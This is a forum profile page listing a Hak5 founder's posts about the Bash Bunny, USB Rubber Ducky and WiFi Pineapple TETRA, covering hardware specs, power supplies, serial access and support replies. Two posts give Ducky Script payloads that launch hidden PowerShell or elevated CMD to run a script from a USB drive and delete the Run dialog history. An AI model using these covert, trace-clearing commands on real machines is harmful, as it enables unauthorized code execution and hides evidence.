Darren Kitchen
-
Posts
4,887 -
Joined
-
Days Won
248
Posts posted by Darren Kitchen
-
-
It really depends on what you're wanting to do. The Armory has some nice specs for a dev platform - so if you have a specific use case in mind and are keen on the programming, go for it. The Bash Bunny is a purpose built pentesting platform. We emphasize the convenience factor and really try to foster a healthy development community around the tools. It's a simple plan that's been working for us for nearly a decade as we've been making infosec tools. So - you could probably do some nifty attacks with the Armory, but there'll be more heavy lifting involved.
As for the hardware differences - while Micro SD is nice for memory expansion, the fast SLC NAND memory in the Bash Bunny is one of the enabling factors for the quick boot -- which is very important for physical pentest engagements. The Bash Bunny has a 50% higher clock speed and 4x more cores. The other specs like RAM and dimensions are similar.
At the end of the day it's really the software, community, and continued support you've come to know from Hak5 that makes the difference.
-
6
-
-
The Bash Bunny averages 1.5A idle - 2A at load - so it works well with either the TETRA or NANO.
-
5
-
-
Payloads repo is now live: https://github.com/hak5/bashbunny-payloads
-
2
-
-
The Bash Bunny wiki is now live at: http://wiki.bashbunny.com/#!index.md
The payload repo will be available shortly-
1
-
-
The Bash Bunny is not a USB Rubber Ducky replacement. While it's compatible with Ducky Script and supports a HID attack mode, that's only one of 5 current attack vectors.
The USB Rubber Ducky will always execute payloads faster (0.1 seconds vs 7 seconds), more economically (less than half the cost), and more covertly (with its generic flash drive case).
For social engineering ops, USB drops and attacks which require the target to plug in the drive, the USB Rubber Ducky is still the gold standard.
-
3
-
-
I'm tidying up a few things in the repo and will be setting it to public today - so stay tuned to bashbunny.com
-
3
-
-
It's the kinda hardware you're gonna wanna hop on...
PS: How do you know when a joke becomes a dad joke?
It's apparent.
-
4
-
-
Yes, the ATTACKMODE command accepts most combinations of RNDIS_ETHERNET, ECM_ETHERNET, STORAGE, SERIAL, and HID. Pick 3
You can also change ATTACKMODE at any time in a payload, conditionally.
This thing is a beast... ??
-
I don't know about 100 Mb/s - I don't have the means to easily test that right now - but I will say I use a TETRA at home as my primary AP with a dedicated LTE modem and always-on OpenVPN connection and easily achieve 40 Mb/s throughput. The limitation is the LTE modem more than anything as taking the OpenVPN tunnel out of the equation doesn't increase speed coming from the LTE modem.
See these Hak5 episodes:
https://www.hak5.org/frontpage/how-to-build-an-openvpn-access-point-hak5-2017
https://www.hak5.org/frontpage/hak5-2018-how-to-build-an-openvpn-access-point-pt-2
https://www.hak5.org/episodes/season-20/hak5-2019-linux-server-build-openvpn-from-scratch
https://www.hak5.org/episodes/season-21/hak5-2111-how-to-tether-without-the-fees
-
1
-
-
Yes - the button replays the payload by default. My apologies for the fault. Please contact shop@hak5.org and we will attend to this matter promptly.
-
DELAY 3000 GUI r DELAY 100 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "rp -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue; $uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\d.cmd" ENTERExecutes "d.cmd" off the root of the USB drive with the label "DK" and clears Run dialog history, as seen in Hak5 episode 2112.
To quickly and easily label the USB drive, select it from "My Computer" and press the F2 key.
-
Fantastic payload 0x41414141
I really like the run line that both opens an obfuscated CMD as well as removes all traces of the command. Might I make one alteration. On Windows 10 you'll receive the following error:
The screen cannot be set to the number of lines and columns specified.
This is because Windows 10 has a minimum command prompt column size of 18, unlike previous versions 14. So to cover most bases, I recommend:
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
Superb payload!
-
1 hour ago, MrKnickerbocker said:
So, days later and still no reply.....
MrKnickerbocker - you were sent an email reply from us on Sept 2 as well as Sept 9. We have not heard back from you on either thread. Please check your spam folder for an email from shop@hak5.org.
-
QSDx25 -
While we are a very small team of 4, we strive for excellence. Most correspondence are returned within 1-2 business days. My support que is empty at the moment, so if for any reason you haven't heard back please email support@hak5.org and I'll see it right away. We unfortunately do not have the bandwidth to offer phone support. Depending on carrier, the tracking # may not update the first day. Sara is staying late answering emails now so you should have received a response if not shortly.
Kerravon -
The intention was not to single you out. The posts you are referencing must be from a different era as I haven't seen them. To clarify, the web interface was released as non-commercial creative commons on github. I acknowledge your good intentions and applaud you for your altruistic teaching efforts. That's a noble cause. Please reference our PMs regarding your NANO exchange. I'm happy to know it was just a return without RMA mistake. Sara should be contacting you shortly with details on the replacement.
Best regards,
Darren
-
Kerravon -
As I have explained to you in PM, these forums are here to support our product -- the WiFi Pineapple. At the time that the original Blue for Pineapple released, the Mark IV was a small volunteer supported endeavor using off-the-shelf equipment, and it was frequently cloned. Had we not sunk everything into the WiFi Pineapple at that time, that would have been the end of the project as we know it.
Instead we went all in - and since then the WiFi Pineapple has grown into a project that supports the Hak5 team. It has enabled us to produce innovative custom hardware and provide the community with continued software updates for that hardware. It's enabled us to grow our shows, with HakTip, ThreatWire, Metasploit Minute and TekThing joining the ranks of Hak5. All of which provide the community with free education.
So in short, I'm not "hell bent on keeping this quiet" -- I'm just not keen on spending resources on hosting a forum to support counterfeit devices that diminish the brand we've worked tirelessly to build. You don't need to agree with me, but you should respect my policy to support Hak5 and the half dozen people I employ who rely on this brand.
Regarding your NANO support, I'm looking at the email thread with you from March 15 where I responded to your request with helpful advice and asked for clarification on a few things. I'm still waiting for a response from you to support@hak5.org.
And no, Hak5 is not a "F*&%K the customers" sort of company. We stand behind our product and will do whatever it takes to make it right. We didn't get to where we are today without being customer focused. It's the same reason why we have 6 generations of the WiFi Pineapple at the same affordable price point - because unlike many in the InfoSec community we aren't into gouging.
Lastly, I offer my deepest apologies that this situation has led to such an unhappy customer experience. Like I said, we stand behind our product and will do what it takes to make it right. If you please reply to the email dated March 15 I will happily continue to provide technical support and an exchange if one is needed.
Best regards,
Darren
-
Hi all -
Just getting back up to speed on this. From what I gather our recent back-end overhaul at wifipineapple.com has caused an issue with OTA module/infusion downloads for the Mark IV. All of these infusions still exist on our servers and I'm working towards making them available for installation by an alternate means shortly. I'll update this thread when it's available.
Best regards,
Darren
-
Smarty -
With the front (LED side) of the WiFi Pineapple TETRA facing you, the two antennas on the left are wlan0 and the two on the right are wlan1. Another way to put look at it is that the two wlan0 antennas are closest to the RJ45 Ethernet port while the two wlan1 antennas are closest to the Reset button. Both radios are in a diversity configuration by default and ship with dual-band antennas.
Also it sounds like your power issue is related to the extra draw of the LTE modem. The upgraded PSU will fix that. You'll be receiving an email shortly if you haven't already.
Cheers,
Darren
-
1
-
-
I can confirm I had no issues running it for 10+ hours on this configuration:
Y-cable cord 1:
2.1a slot of Pineapple 15000
Y-cable cord 2:
Anker PowerCore+ 13400 2.4a (http://www.amazon.com/gp/product/B013HSWY5K)
Standard Micro-Usb cord:
Anker PowerCore+ 10050 2.4a (http://www.amazon.com/gp/product/B013HSQXZC)
I also just got the Anker PowerCore 20100 (note no +) which is 2.4a as well (http://www.amazon.com/gp/product/B013HSQXZC) and don't see any reason that wouldn't work as well.
Note I had 3 separate packs connected to run for that prolonged period of time.
After returning from deadpool my tetra was restarting after getting pineap flashing the red light, i'm posting the video of it doing this with just the two pineapple 15000 to the thread once I have it uploaded: https://forums.hak5.org/index.php?/topic/37663-pineapple-tetra-reboots-after-a-few-minutes/
That's 34.5 watts capacity. You'll never draw all of that power. You could get away with any two of the above three and be fine -- but what you're doing with three is prolonging your run time.
-
It's a desktop, one y cable usb 3 I believe..... I had about 30 minutes to mess with everything today..... It booted I was able to connect.... It ran idle just fine connected to it.....12v 1a power supply that was sent, worked fine idle...... I just couldn't boot with the batteries..... One of them would turn off... No lights..... But you posted a pic in the other thread.... If that's the proper configuration...that is not how I conected....I used one y cable conected to both bateries.....possibly I screwed up..... I'm going to try that..... Maybe tonight.....(its kind of late CT)....
thank... you... for... the... detailed... response...
-
1
-
-
I know there's a way to do this with screen, but I'm a minicom man myself so I'll give you setup instructions for that:
Connect cable from PC to TETRA USB UART port
sudo apt-get install mincom
sudo minicom -s
Go to Serial Port setup the make sure it's set to /dev/ttyUSB0 as the device, 115200 as the speed, and 81N as in 8 data bits, 1 stop bit, no parity bit. Then save as default and either exit setup and re-issue sudo minicom without the -s, or select exit which'll drop you into the terminal. Press enter to activate -- you'll be prompted to login.
If you run this while booting you'll can watch the kernel come to life. Keep this open and log what happens when there's an issue.
Lemme tell you - having super convenient serial access in dev has been a boon. I highly recommend it.
BTW you can do the same in Windows with PuTTY and I'm sure there's something out there for mac.
I'll let the next guy school me on how screen > minicom later ;-)
-
Internal code name to differentiate from the NANO - which got its name from a text editor that's better than another text editor that can be read as 6 in roman numerals. If you do the math the TETRA is the 7th WiFi Pineapple hardware to date, but it along with the NANO are sharing the 6th Generation title (and software base). But anyway, the real easter egg is in the stager firmware which you flashed over during initial setup. Oh well...
-
The Pineapple Juice 15000 will power down if there isn't any draw after 30 seconds. I posted this in another thread but you might look into powering using this cable configuration:
-
What battery would you suggest shadowmmm and bored369?
I waiting for a confirmation/recognition of an email sent to hak5, to replace a faulty battery, I can't even boot with the 2 pineapple 15000's I recieved..... One of them turns off during boot.
Not really blaming hak5, rf shielding and tweaking raised power consumption. So far with very little testing, my Tetra works fine powered with 12v 1a power supply, and y cable connected to a desktop.
Again my testing has been limited, not having much time for the next week or so, but I guess I might start looking for alternatives anyway..... I really want to be mobile with my Tetra.
Just a thought - does your laptop have 3+ USB ports?
-
Did you email shop@hak5.org ? You should receive a reply in 1-2 business days. I also concur that it sounds like a power issue. Do you have it in this configuration?
If it's still happening with 18+ watts (either 2x Pineapple Juice or a 12V/2A adapter) I'll start suspecting software.
Can you post the output of the serial console from the moment it reboots?
Windows 10 Support
in Bash Bunny
Posted
The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows ability to recognize RNDIS as one.
When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally.
As for the USB disk - when the payload executes it can access the storage from /root/udisk. At the moment this gets unmounted from the Linux side when payload execution completes. So if you terminal in and ls /root/udisk you won't see anything.